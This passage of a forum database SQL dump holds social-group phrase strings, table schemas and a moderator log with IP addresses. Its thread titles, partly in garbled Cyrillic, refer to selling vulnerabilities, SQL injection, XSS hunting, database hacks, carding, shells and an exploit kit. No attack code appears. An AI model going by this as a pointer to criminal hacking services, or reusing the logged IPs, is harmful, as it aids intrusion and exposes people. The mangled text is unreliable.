Ownership of Social Group %1$s\";s:19:\"post_new_discussion\";s:19:\"Post New Discussion\";s:19:\"prune_social_groups\";s:19:\"Prune Social Groups\";s:12:\"random_group\";s:12:\"Random Group\";s:17:\"remove_from_group\";s:17:\"Remove from group\";s:25:\"remove_picture_from_group\";s:25:\"Remove Picture from Group\";s:19:\"reply_to_discussion\";s:19:\"Reply to Discussion\";s:20:\"report_group_message\";s:27:\"Report Social Group Message\";s:16:\"request_transfer\";s:16:\"Request Transfer\";s:18:\"search_discussions\";s:18:\"Search Discussions\";s:13:\"search_groups\";s:13:\"Search Groups\";s:20:\"search_social_groups\";s:20:\"Search Social Groups\";s:17:\"select_a_category\";s:17:\"Select a Category\";s:27:\"select_destination_category\";s:27:\"Select Destination Category\";s:20:\"selected_discussions\";s:20:\"Selected Discussions\";s:15:\"selected_groups\";s:15:\"Selected Groups\";s:26:\"showing_discussions_x_of_y\";s:32:\"Showing Discussions %1$s of %2$s\";s:31:\"showing_discussions_x_to_y_of_z\";s:40:\"Showing Discussions %1$s to %2$s of %3$s\";s:23:\"showing_gms_x_to_y_of_z\";s:125:\"Showing Social Group Messages %1$s to %2$s of %3$s \";s:22:\"showing_x_of_y_members\";s:30:\"Showing %1$s of %2$s Member(s)\";s:23:\"showing_x_of_y_pictures\";s:31:\"Showing %1$s of %2$s Picture(s)\";s:4:\"skip\";s:4:\"Skip\";s:12:\"social_group\";s:12:\"Social Group\";s:23:\"social_group_categories\";s:23:\"Social Group Categories\";s:21:\"social_group_category\";s:21:\"Social Group Category\";s:23:\"social_group_discussion\";s:23:\"Social Group Discussion\";s:29:\"social_group_discussions_in_x\";s:61:\"Social Group Discussions in: %1$s \";s:17:\"social_group_icon\";s:17:\"Social Group Icon\";s:18:\"social_group_icons\";s:18:\"Social Group Icons\";s:26:\"social_group_icons_manager\";s:26:\"Social Group Icons Manager\";s:13:\"social_groups\";s:13:\"Social Groups\";s:28:\"subscribe_to_this_discussion\";s:28:\"Subscribe to This Discussion\";s:23:\"subscribe_to_this_group\";s:23:\"Subscribe to This Group\";s:22:\"subscribed_discussions\";s:22:\"Subscribed Discussions\";s:37:\"successfully_requested_group_transfer\";s:33:\"A transfer request has been sent.\";s:47:\"the_following_pictures_added_group_successfully\";s:61:\"The following pictures were added to this group successfully:\";s:41:\"the_following_pictures_already_part_group\";s:55:\"The following pictures were already part of this group:\";s:44:\"this_person_is_already_a_member_of_the_group\";s:44:\"This person is already a member of the group\";s:39:\"this_user_is_not_allowed_to_join_groups\";s:46:\"This user is not allowed to join Social Groups\";s:14:\"transfer_group\";s:14:\"Transfer Group\";s:24:\"transfer_group_ownership\";s:24:\"Transfer Group Ownership\";s:29:\"transfer_group_ownership_info\";s:457:\"If you no longer wish to maintain this social group, you may request another user to take ownership of it instead. Enter the name of the user you would like to transfer the ownership of the social group to. \r\nThe user that you request to transfer the group to will receive a private message and an option to confirm the transfer. You may cancel the transfer until the target user has confirmed that they will take over the social group for you.\";s:16:\"transfer_to_user\";s:16:\"Transfer to User\";s:21:\"unapprove_discussions\";s:21:\"Unapprove Discussions\";s:20:\"undelete_discussions\";s:20:\"Undelete Discussions\";s:32:\"unsubscribe_from_this_discussion\";s:32:\"Unsubscribe from this Discussion\";s:27:\"unsubscribe_from_this_group\";s:27:\"Unsubscribe from this Group\";s:52:\"url_to_group_icons_relative_to_your_forums_home_page\";s:72:\"URL to Social Group Icons (Relative to your forums home page) \";s:23:\"user_already_owns_group\";s:40:\"User already has ownership of this group\";s:38:\"user_cannot_own_any_more_social_groups\";s:39:\"User cannot own any more social groups.\";s:19:\"user_does_not_exist\";s:19:\"User does not exist\";s:50:\"user_does_not_have_permission_to_own_social_groups\";s:51:\"User does not have permission to own social groups.\";s:31:\"users_must_join_to_view_content\";s:35:\"Users must join to view the content\";s:19:\"view_all_categories\";s:19:\"View All Categories\";s:15:\"view_all_groups\";s:15:\"View All Groups\";s:16:\"view_all_members\";s:16:\"View All Members\";s:9:\"view_next\";s:9:\"View Next\";s:13:\"view_previous\";s:13:\"View Previous\";s:76:\"we_are_ready_to_attempt_to_move_your_group_icons_from_database_to_filesystem\";s:399:\"We are ready to attempt to move your Social Group Icons from the Database to the Filesystem.
It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.
We will not finalize the move until the end of the process.
If the process aborts before the end, you will need to free up space before trying again.
\";s:76:\"we_are_ready_to_attempt_to_move_your_group_icons_from_filesystem_to_database\";s:389:\"We are ready to attempt to move your Social Group Icons from the Filesystem to the Database.
It is possible that you might not have enough space in the database but we are unable to determine that ahead of time.
We will not finalize the move until the end of the process.
If the process aborts before the end, you will need to free up space before trying again.
\";s:21:\"x_awaiting_moderation\";s:24:\"%1$s awaiting moderation\";s:8:\"x_groups\";s:11:\"%1$s groups\";s:9:\"x_members\";s:14:\"%1$s member(s)\";s:34:\"you_are_not_a_member_of_any_groups\";s:34:\"You are not a member of any groups\";s:21:\"you_are_not_the_owner\";s:35:\"You are not the Owner of this group\";s:29:\"you_did_not_select_any_groups\";s:30:\"You did not select any groups.\";s:34:\"you_have_no_subscribed_discussions\";s:42:\"You have not subscribed to any discussions\";s:11:\"your_groups\";s:11:\"Your Groups\";s:32:\"your_groups_in_need_of_attention\";s:32:\"Your Groups In Need Of Attention\";s:35:\"your_groups_with_moderated_messages\";s:35:\"Your Groups with Moderated Messages\";s:12:\"your_invites\";s:12:\"Your Invites\";}');
DROP TABLE IF EXISTS `mailqueue`;
CREATE TABLE `mailqueue` (
`mailqueueid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`toemail` mediumtext,
`fromemail` mediumtext,
`subject` mediumtext,
`message` mediumtext,
`header` mediumtext,
PRIMARY KEY (`mailqueueid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `moderation`;
CREATE TABLE `moderation` (
`primaryid` int(10) unsigned NOT NULL DEFAULT '0',
`type` enum('thread','reply','visitormessage','groupmessage','picturecomment') NOT NULL DEFAULT 'thread',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`primaryid`,`type`),
KEY `type` (`type`,`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `moderation` (`primaryid`, `type`, `dateline`) VALUES
(1859, 'thread', 1439825521),
(1612, 'thread', 1442576439),
(1032, 'thread', 1442918962),
(1035, 'thread', 1442918962),
(1036, 'thread', 1442918962),
(1037, 'thread', 1442918962),
(1038, 'thread', 1442918962),
(1040, 'thread', 1442918962),
(1041, 'thread', 1442918962),
(1042, 'thread', 1442918962),
(1043, 'thread', 1442918962),
(1044, 'thread', 1442918962),
(1045, 'thread', 1442918962),
(1046, 'thread', 1442918962),
(1048, 'thread', 1442918962),
(1049, 'thread', 1442918962),
(1050, 'thread', 1442918962),
(1053, 'thread', 1442918962),
(1054, 'thread', 1442918962),
(1061, 'thread', 1442918962),
(1841, 'thread', 1443898284),
(1840, 'thread', 1444660612),
(2397, 'thread', 1446222545),
(2497, 'thread', 1458612896),
(2501, 'thread', 1460311677),
(2958, 'reply', 1450821201),
(3003, 'reply', 1456070598),
(3019, 'reply', 1456913289),
(3031, 'reply', 1458689258),
(3049, 'reply', 1464451741);
DROP TABLE IF EXISTS `moderator`;
CREATE TABLE `moderator` (
`moderatorid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`forumid` smallint(6) NOT NULL DEFAULT '0',
`permissions` int(10) unsigned NOT NULL DEFAULT '0',
`permissions2` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`moderatorid`),
UNIQUE KEY `userid_forumid` (`userid`,`forumid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `moderator` (`moderatorid`, `userid`, `forumid`, `permissions`, `permissions2`) VALUES
(1, 1, -1, 8339455, 4194303);
DROP TABLE IF EXISTS `moderatorlog`;
CREATE TABLE `moderatorlog` (
`moderatorlogid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`forumid` smallint(5) unsigned NOT NULL DEFAULT '0',
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`postid` int(10) unsigned NOT NULL DEFAULT '0',
`pollid` int(10) unsigned NOT NULL DEFAULT '0',
`attachmentid` int(10) unsigned NOT NULL DEFAULT '0',
`action` varchar(250) NOT NULL DEFAULT '',
`type` smallint(5) unsigned NOT NULL DEFAULT '0',
`threadtitle` varchar(250) NOT NULL DEFAULT '',
`ipaddress` char(15) NOT NULL DEFAULT '',
`product` varchar(25) NOT NULL DEFAULT '',
`id1` int(10) unsigned NOT NULL DEFAULT '0',
`id2` int(10) unsigned NOT NULL DEFAULT '0',
`id3` int(10) unsigned NOT NULL DEFAULT '0',
`id4` int(10) unsigned NOT NULL DEFAULT '0',
`id5` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`moderatorlogid`),
KEY `threadid` (`threadid`),
KEY `product` (`product`),
KEY `id1` (`id1`),
KEY `id2` (`id2`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `moderatorlog` (`moderatorlogid`, `dateline`, `userid`, `forumid`, `threadid`, `postid`, `pollid`, `attachmentid`, `action`, `type`, `threadtitle`, `ipaddress`, `product`, `id1`, `id2`, `id3`, `id4`, `id5`) VALUES
(1, 1420395965, 1, 2, 1822, 0, 0, 0, '', 14, '???', '46.146.211.11', '', 0, 0, 0, 0, 0),
(2, 1420397675, 1, 18, 1823, 0, 0, 0, '', 15, '123', '46.146.211.11', '', 0, 0, 0, 0, 0),
(3, 1420397675, 1, 18, 1824, 0, 0, 0, '', 15, 'а тут заголовок', '46.146.211.11', '', 0, 0, 0, 0, 0),
(4, 1420398051, 1, 18, 1821, 0, 0, 0, 'ßþúуÿúð-ÿрþôðöð', 29, 'Покупка-продажа', '46.146.211.11', '', 0, 0, 0, 0, 0),
(5, 1420398093, 1, 18, 1821, 2221, 0, 0, 'Покупка-продажа', 20, 'Покупка-продажа', '46.146.211.11', '', 0, 0, 0, 0, 0),
(6, 1420398117, 1, 18, 1765, 0, 0, 0, 'ÑÂõрòõр ýõ òыÿþûýÑÂõт ÷ðóруöõýýыõ фðùûы', 29, 'сервер не выполняет загруженные файлы', '46.146.211.11', '', 0, 0, 0, 0, 0),
(7, 1420398137, 1, 18, 1765, 2151, 0, 0, 'сервер не выполняет загруженные файлы', 20, 'сервер не выполняет загруженные файлы', '46.146.211.11', '', 0, 0, 0, 0, 0),
(8, 1420398461, 1, 18, 1753, 0, 0, 0, '÷ðñðòýыõ úðртøýø ÿþ тõüðтøúõ', 29, 'забавные картини по тематике', '46.146.211.11', '', 0, 0, 0, 0, 0),
(9, 1420398477, 1, 18, 1753, 2132, 0, 0, 'забавные картини по тематике', 20, 'забавные картини по тематике', '46.146.211.11', '', 0, 0, 0, 0, 0),
(10, 1420398505, 1, 18, 1734, 0, 0, 0, 'úþтðýы úтþ ýøñуôь òÿðрøòðû úÑÂѠÿþ ÿþчтõ?', 29, 'котаны кто нибудь впаривал по почте?', '46.146.211.11', '', 0, 0, 0, 0, 0),
(11, 1420398520, 1, 18, 1676, 0, 0, 0, '"ñð÷ы" mailru, yandex, gmail', 29, '"базы" mailru, yandex, gmail', '46.146.211.11', '', 0, 0, 0, 0, 0),
(12, 1420398534, 1, 18, 1637, 0, 0, 0, 'хõшø!', 29, 'хеши!', '46.146.211.11', '', 0, 0, 0, 0, 0),
(13, 1420398549, 1, 18, 1627, 0, 0, 0, 'øóрð - рð÷üøýúð [ÿþøÑÂú xss]', 29, 'игра - разминка [поисÂк xss]', '46.146.211.11', '', 0, 0, 0, 0, 0),
(14, 1420398563, 1, 18, 1103, 0, 0, 0, 'ßрþôðöð уÑÂ÷òøüþÑÂтõù.', 29, 'Продажа уяÂзвимосÂтей.', '46.146.211.11', '', 0, 0, 0, 0, 0),
(15, 1420398575, 1, 18, 1402, 0, 0, 0, 'çтþ ôõûðõü ôðûьшõ?', 29, 'Что делаем дальше?', '46.146.211.11', '', 0, 0, 0, 0, 0),
(16, 1420398588, 1, 18, 1141, 0, 0, 0, 'ÿþÑÂþýы úтþ шðрøт ò swf?', 29, 'посоны кто шарит в swf?', '46.146.211.11', '', 0, 0, 0, 0, 0),
(17, 1420398597, 1, 18, 1137, 0, 0, 0, 'øщу ñô хðú/úðрö ÿþртðûþò.', 29, 'ищу бд хак/карж порталов.', '46.146.211.11', '', 0, 0, 0, 0, 0),
(18, 1420398607, 1, 18, 1112, 0, 0, 0, 'Üðûõýьúøõ ÿþûõ÷ýþÑÂтø', 29, 'Маленькие полезносÂти', '46.146.211.11', '', 0, 0, 0, 0, 0),
(19, 1420398618, 1, 18, 1095, 0, 0, 0, 'Üþöõт üðóð÷øý þтúрþõü', 29, 'Может магазин откроем', '46.146.211.11', '', 0, 0, 0, 0, 0),
(20, 1420410992, 1, 7, 1064, 0, 0, 0, '÷ðúð÷ы', 29, '', '46.146.211.11', '', 0, 0, 0, 0, 0),
(21, 1420411005, 1, 7, 1083, 0, 0, 0, '÷ðúð÷ы ýð ÿþхõú :)', 29, '', '46.146.211.11', '', 0, 0, 0, 0, 0),
(22, 1420411017, 1, 7, 1140, 0, 0, 0, 'Þтрðñþтúð Òðшøх ôðüÿþò', 29, 'Отработка Ваших дампов', '46.146.211.11', '', 0, 0, 0, 0, 0),
(23, 1420411032, 1, 7, 1518, 0, 0, 0, 'ÿрøýøüðю ÷ðúð÷ы ýð ÑÂûøò ñô', 29, '', '46.146.211.11', '', 0, 0, 0, 0, 0),
(24, 1420411062, 1, 7, 1751, 0, 0, 0, 'Mssql - ø÷òûõчõýøѠÑÂûõÿþù òýõÿþûþÑÂýыù (out of band)', 29, '', '46.146.211.11', '', 0, 0, 0, 0, 0),
(25, 1420411081, 1, 7, 1728, 0, 0, 0, 'чõúýøтõ ÿûø÷ ýð ñðóø ÑÂðùты ñðýúð тøýьúþфф', 29, '', '46.146.211.11', '', 0, 0, 0, 0, 0),
(26, 1420411116, 1, 7, 1733, 0, 0, 0, 'ÃÂõÑÂúþûьúþ sql inj', 29, '', '46.146.211.11', '', 0, 0, 0, 0, 0),
(27, 1420411145, 1, 7, 1622, 0, 0, 0, 'à у шõûûы.', 29, '', '46.146.211.11', '', 0, 0, 0, 0, 0),
(28, 1420411153, 1, 7, 1175, 0, 0, 0, '×ðúð÷ þт Tut.by', 29, 'Tut.by', '46.146.211.11', '', 0, 0, 0, 0, 0),
(29, 1420411179, 1, 7, 1733, 0, 0, 0, 'Несколько sql inj', 29, '', '46.146.211.11', '', 0, 0, 0, 0, 0),
(30, 1420474667, 1, 16, 1052, 0, 0, 0, 'Ñрут ðôüøýþú ÑÂPanel', 29, '', '46.146.211.11', '', 0, 0, 0, 0, 0),
(31, 1420707823, 1, 16, 1684, 1983, 0, 0, 'Best AES Crypto / ûучшõ AES шøфрþòðýøõ', 20, 'Best AES Crypto', '46.146.211.11', '', 0, 0, 0, 0, 0),
(32, 1420707835, 1, 16, 1684, 0, 0, 0, 'Best AES Crypto / ûучшõ AES шøфрþòðýøõ', 29, 'Best AES Crypto', '46.146.211.11', '', 0, 0, 0, 0, 0),
(33, 1422256468, 1, 13, 1826, 0, 0, 0, '', 14, '', '46.146.211.11', '', 0, 0, 0, 0, 0),
(34, 1427901617, 100, 7, 1833, 0, 0, 0, 'ØýтõрõÑÂõý Whatsapp', 29, 'ИнтересÂен Whatsapp', '141.101.105.178', '', 0, 0, 0, 0, 0),
(35, 1427901831, 100, 7, 1833, 2253, 0, 0, 'ИнтересÂен Whatsapp', 20, 'ИнтересÂен Whatsapp', '141.101.105.178', '', 0, 0, 0, 0, 0),
(36, 1427901865, 100, 7, 1833, 2253, 0, 0, 'ИнтересÂен Whatsapp', 20, 'ИнтересÂен Whatsapp', '141.101.105.178', '', 0, 0, 0, 0, 0),
(37, 1439062066, 100, 2, 1842, 0, 0, 0, '', 14, 'ÃÂþòðѠ÷ðÑÂòúð þт {$name}', '162.158.90.82', '', 0, 0, 0, 0, 0),
(38, 1439063183, 100, 2, 1843, 0, 0, 0, '', 14, 'errr`', '162.158.91.143', '', 0, 0, 0, 0, 0),
(39, 1439064743, 100, 2, 1844, 0, 0, 0, '', 14, 'kl;kk;l - {email}', '162.158.90.82', '', 0, 0, 0, 0, 0),
(40, 1439065145, 100, 2, 1822, 0, 0, 0, '', 15, '???', '162.158.90.82', '', 0, 0, 0, 0, 0),
(41, 1439065145, 100, 2, 1842, 0, 0, 0, '', 15, 'ÃÂþòðѠ÷ðÑÂòúð þт {$name}', '162.158.90.82', '', 0, 0, 0, 0, 0),
(42, 1439065145, 100, 2, 1843, 0, 0, 0, '', 15, 'errr`', '162.158.90.82', '', 0, 0, 0, 0, 0),
(43, 1439065145, 100, 2, 1844, 0, 0, 0, '', 15, 'kl;kk;l - {email}', '162.158.90.82', '', 0, 0, 0, 0, 0),
(44, 1439065145, 100, 2, 1845, 0, 0, 0, '', 15, 'New invite:', '162.158.90.82', '', 0, 0, 0, 0, 0),
(45, 1439065145, 100, 2, 1846, 0, 0, 0, '', 15, 'w0rm', '162.158.90.82', '', 0, 0, 0, 0, 0),
(46, 1439066323, 100, 2, 1847, 0, 0, 0, '', 15, 'nickname', '162.158.90.82', '', 0, 0, 0, 0, 0),
(47, 1439210287, 100, 16, 1849, 0, 0, 0, '', 14, 'Check4you.net Online Free Scanner', '162.158.90.112', '', 0, 0, 0, 0, 0),
(48, 1439210311, 100, 16, 1851, 0, 0, 0, '', 1, '', '162.158.90.112', '', 0, 0, 0, 0, 0),
(49, 1439210311, 100, 7, 1850, 0, 0, 0, '', 23, 'cpanels & shells', '162.158.90.112', '', 0, 0, 0, 0, 0),
(50, 1439295670, 100, 2, 1856, 0, 0, 0, 'news', 3, 'Hunter ExploitKit', '162.158.91.143', '', 0, 0, 0, 0, 0),
(51, 1439295695, 100, 13, 1856, 0, 0, 0, '', 10, 'Hunter ExploitKit', '162.158.91.143', '', 0, 0, 0, 0, 0),
(52, 1439822507, 100, 2, 1853, 0, 0, 0, 'activated', 3, '', '162.158.90.82', '', 0, 0, 0, 0, 0),
(53, 1439825521, 100, 7, 1859, 0, 0, 0, '', 22, '', '162.158.90.82', '', 0, 0, 0, 0, 0),
(54, 1439985651, 100, 7, 1862, 0, 0, 0, '', 10, '', '162.158.90.82', '', 0, 0, 0, 0, 0),
(55, 1440496498, 1, 2, 2158, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(56, 1440496498, 1, 2, 2163, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(57, 1440496498, 1, 2, 2164, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(58, 1440496498, 1, 2, 2165, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(59, 1440496498, 1, 2, 2166, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(60, 1440496498, 1, 2, 2167, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(61, 1440496498, 1, 2, 2168, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(62, 1440496498, 1, 2, 2169, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(63, 1440496498, 1, 2, 2170, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(64, 1440496498, 1, 2, 2171, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(65, 1440496498, 1, 2, 2172, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(66, 1440496498, 1, 2, 2173, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(67, 1440496498, 1, 2, 2174, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(68, 1440496498, 1, 2, 2175, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(69, 1440496498, 1, 2, 2176, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(70, 1440496498, 1, 2, 2177, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(71, 1440496498, 1, 2, 2178, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(72, 1440496498, 1, 2, 2179, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(73, 1440496498, 1, 2, 2180, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(74, 1440496498, 1, 2, 2181, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(75, 1440496498, 1, 2, 2182, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(76, 1440496498, 1, 2, 2183, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(77, 1440496498, 1, 2, 2184, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(78, 1440496498, 1, 2, 2185, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(79, 1440496498, 1, 2, 2186, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(80, 1440496498, 1, 2, 2187, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(81, 1440496498, 1, 2, 2188, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(82, 1440496498, 1, 2, 2189, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(83, 1440496498, 1, 2, 2190, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(84, 1440496498, 1, 2, 2191, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(85, 1440496498, 1, 2, 2192, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(86, 1440496498, 1, 2, 2193, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(87, 1440496498, 1, 2, 2194, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(88, 1440496498, 1, 2, 2195, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(89, 1440496498, 1, 2, 2196, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(90, 1440496498, 1, 2, 2197, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(91, 1440496498, 1, 2, 2198, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(92, 1440496498, 1, 2, 2199, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(93, 1440496498, 1, 2, 2200, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(94, 1440496498, 1, 2, 2201, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(95, 1440496498, 1, 2, 2202, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(96, 1440496498, 1, 2, 2203, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(97, 1440496498, 1, 2, 2204, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(98, 1440496498, 1, 2, 2205, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(99, 1440496498, 1, 2, 2206, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(100, 1440496498, 1, 2, 2207, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(101, 1440496498, 1, 2, 2208, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(102, 1440496498, 1, 2, 2209, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(103, 1440496498, 1, 2, 2210, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(104, 1440496498, 1, 2, 2211, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(105, 1440496498, 1, 2, 2212, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(106, 1440496498, 1, 2, 2213, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(107, 1440496498, 1, 2, 2214, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(108, 1440496498, 1, 2, 2215, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(109, 1440496498, 1, 2, 2216, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(110, 1440496498, 1, 2, 2217, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(111, 1440496498, 1, 2, 2218, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(112, 1440496498, 1, 2, 2219, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(113, 1440496498, 1, 2, 2220, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(114, 1440496498, 1, 2, 2221, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(115, 1440496498, 1, 2, 2222, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(116, 1440496498, 1, 2, 2223, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(117, 1440496498, 1, 2, 2224, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(118, 1440496498, 1, 2, 2225, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(119, 1440496498, 1, 2, 2226, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(120, 1440496498, 1, 2, 2227, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(121, 1440496498, 1, 2, 2228, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(122, 1440496498, 1, 2, 2229, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(123, 1440496498, 1, 2, 2230, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(124, 1440496498, 1, 2, 2231, 0, 0, 0, '', 15, 'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(125, 1440496987, 1, 2, 1926, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(126, 1440496987, 1, 2, 1927, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(127, 1440496987, 1, 2, 1930, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(128, 1440496987, 1, 2, 1931, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(129, 1440496987, 1, 2, 1932, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(130, 1440496987, 1, 2, 1933, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(131, 1440496987, 1, 2, 1934, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(132, 1440496987, 1, 2, 1935, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(133, 1440496987, 1, 2, 1936, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(134, 1440496987, 1, 2, 1937, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(135, 1440496987, 1, 2, 1938, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(136, 1440496987, 1, 2, 1939, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(137, 1440496987, 1, 2, 1940, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(138, 1440496987, 1, 2, 1941, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
